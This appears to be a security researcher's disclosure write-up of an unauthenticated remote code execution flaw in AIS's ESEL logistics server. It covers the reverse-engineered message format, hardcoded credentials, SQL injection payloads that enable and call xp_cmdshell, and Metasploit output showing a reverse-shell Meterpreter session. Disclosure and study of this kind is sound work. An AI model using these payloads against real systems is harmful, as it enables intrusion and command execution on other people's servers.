TL;DRAn unauthenticated RCE on public exposed Systems of a logistics software was discovered. The mobile app of drivers communicate with on-premise or cloud backend servers by a custom ‘protocol’ that is affected by an SQL-Injection.
Introduction
During an attack simulation back in 2019, we discovered an unknown service exposed on TCP port 5099 . As we had already gained internal access to the customer, we searched for the internal server and looked up what is running. The service was called “ESEL”. After examining the files, it turned out that it was a logistics software from AIS (Advanced InfoData Systems GmbH).
The service is used by mobile apps but they are not published in the app store. Therefore, we needed to reverse engineer the server code to understand its functionality.
Reverse Engineering
As the application was written in C#, it could be easily decompiled using ILSpy or other tools.
The code shows that during service startup, an ‘ESELServer’ object is created within ESELLib. After searching through the code, a function called “HandleLogin” seems interesting. The function is called by “DecodeMessage” which is called by “HandleMessage”.
Message-Format
After analyzing the code, we reconstructed a valid login message. The system uses a custom message format.
Format:
[MSG-LEN]ÿ[MSG-NO=> Bool flag für ACK]ÿ[DATE-STAMP]ÿ[VERSION]ÿ[MSG-TYP => e.g. login]ÿ[FLAG => ~ACK]ÿ[USERNAME]ÿ[Password]ÿ[CLIENT]ÿ[CLIENT-INFO ? NOT USED]ÿ
Example:
0085ÿ000000ÿ20170810213226ÿ01ÿ60ÿ02ÿ76a31de7ÿ76a31de7ÿAISmobileAND_1.218ÿ#A valid message was created and tested against an AIS Esel Server:
We discovered hardcoded AIS credentials in the config files and used them to verify our login message. So, it is probably possible to authenticate to all available servers. On an ESEL-Server hosted by AIS itself, the credentials worked, too.
NOTEthe databaseConnectionString uses the same password for the “sa” user. We should keep in mind that the database is used by the default administrative user “sa”.
Exploit
The following line looked promising for an SQL-Injection
Let’s give it a try:
The injection succeeded without modification. But this is not yet an RCE! However, it is well known that you can achieve an RCE through an SQL Injection with MSSQL Server if the “sa” user is used and the config allows to use the xp_cmdshell stored procedure.
Password'; USE master; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE --
Password'; exec xp_cmdshell 'echo "hallo" >C:\testAfter this was successfull, too, we decided to write a Metasploit modul. This provides an easy way to execute arbitrary payload with only little effort.
The complete Metasploit exploit required only a few lines of code https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/ais_esel_server_rce.rb
msf5 > use exploit/windows/misc/ais_esel_server_rce
msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
rhosts => 10.66.75.212
msf5 exploit(windows/misc/ais_esel_server_rce) > check
[+] 10.66.75.212:5099 - The target is vulnerable.
msf5 exploit(windows/misc/ais_esel_server_rce) > run
[*] Started reverse TCP handler on 10.66.75.208:4444
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] 10.66.75.212:5099 - Command Stager progress - 1.47% done (1499/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] 10.66.75.212:5099 - Command Stager progress - 2.93% done (2998/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
...
[*] 10.66.75.212:5099 - Command Stager progress - 99.55% done (101827/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] Sending stage (179779 bytes) to 10.66.75.212
[*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
[!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
[*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
[*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100
meterpreter > getuid
Server username: NT Service\\\\MSSQL$AISOther vulnerabilities
There are also other vulnerablilities not discussed in detail here. They are mainly regarding weak configurations, high privileged accounts and default passwords.
DisclosureThe vendor did not have any contact or process for reporting security vulnerabilities. After some mails and calls, the SQL-injecion was fixed somehow. Other issues were not fixed to our knowledge.